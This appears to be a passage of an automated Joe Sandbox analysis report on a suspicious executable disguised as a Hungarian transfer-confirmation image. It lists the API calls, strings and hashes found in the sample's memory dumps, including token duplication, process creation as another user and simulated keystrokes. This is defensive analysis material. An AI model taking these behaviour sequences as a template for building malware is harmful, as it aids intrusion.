                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wfsopen
                                                                                                          • String ID:
                                                                                                          • API String ID: 197181222-0
                                                                                                          • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                                                                                                          • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                          • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03C322F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                          • Instruction ID: f71f92ad4babdb40d43246ab5c5194f3e8ca553412f4374effe74b554d9995b8
                                                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                          • Instruction Fuzzy Hash: CAE0BF7494010DEFDB00EFA8D5496DD7BB4EF04301F1005A1FD05D7680DB309E548A62
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000001F4), ref: 03C322F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2200355296.0000000003C30000.00000040.00000020.00020000.00000000.sdmp, Offset: 03C30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_3c30000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 3472027048-0
                                                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction ID: b1235328b038ac8fd7a9869fbcd506c8e81833c9f321d6e5bf59ea5f0e45aeee
                                                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                          • Instruction Fuzzy Hash: 0FE0E67494010DDFDB00EFB8D54969D7BB4EF04301F1005A1FD01D2280D6309D508A72
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                                                          • ImageList_SetDragCursorImage.COMCTL32(00AC59A8,00000000,00000000,00000000), ref: 0047CB9B
                                                                                                          • ImageList_BeginDrag.COMCTL32(00AC59A8,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,02EE1C40,00000000,?,?,?,?), ref: 0047CF1C
                                                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,02EE1C40,00000000,?,?,?,?), ref: 0047CFE6
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                                          • String ID: @GUI_DRAGID$F
                                                                                                          • API String ID: 3100379633-4164748364
                                                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                          • String ID: Shell_TrayWnd
                                                                                                          • API String ID: 2889586943-2988720461
                                                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                                                          APIs
                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                                                          • String ID: $@OH$default$winsta0
                                                                                                          • API String ID: 3324942560-3791954436
                                                                                                          • Opcode ID: 3399b8295c7c69479d02148f997ef1a2228b9a46e895cdd3e83dbd6c3360cb32
                                                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                                                          • Opcode Fuzzy Hash: 3399b8295c7c69479d02148f997ef1a2228b9a46e895cdd3e83dbd6c3360cb32
                                                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                          • API String ID: 999945258-2428617273
                                                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                          APIs
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                                                          Strings
                                                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                          • Unterminated string, xrefs: 00428348
                                                                                                          • Error opening the file, xrefs: 00428231
                                                                                                          • _, xrefs: 0040371C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                          • API String ID: 3393021363-188983378
                                                                                                          • Opcode ID: 429202cf83013c27d1cff007541d99969aca51ac9dbfed04581a67616158d41a
                                                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                          • Opcode Fuzzy Hash: 429202cf83013c27d1cff007541d99969aca51ac9dbfed04581a67616158d41a
                                                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                          APIs
                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                          • String ID: *.*
                                                                                                          • API String ID: 1409584000-438819550
                                                                                                          • Opcode ID: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction ID: b696eadadcb8a1627fc7fa6feda0e6e57aab690e04623b9265854ab7309d24dd
                                                                                                          • Opcode Fuzzy Hash: 375c8f5163c02f9b34b1ce4408ff1b09f98ffe2d72fc8025119183882b6461df
                                                                                                          • Instruction Fuzzy Hash: CE41D8726002046BC700EF65DC45EAFB3ACAE89311F04592FF954C3190E7B8E519C7A9
                                                                                                          APIs
                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                          • __swprintf.LIBCMT ref: 00431C2E
                                                                                                          • _wcslen.LIBCMT ref: 00431C3A
                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                          • String ID: :$\$\??\%s
                                                                                                          • API String ID: 2192556992-3457252023
                                                                                                          • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                          • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                          • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                          APIs
                                                                                                          • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                          • __swprintf.LIBCMT ref: 004722B9
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                          • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
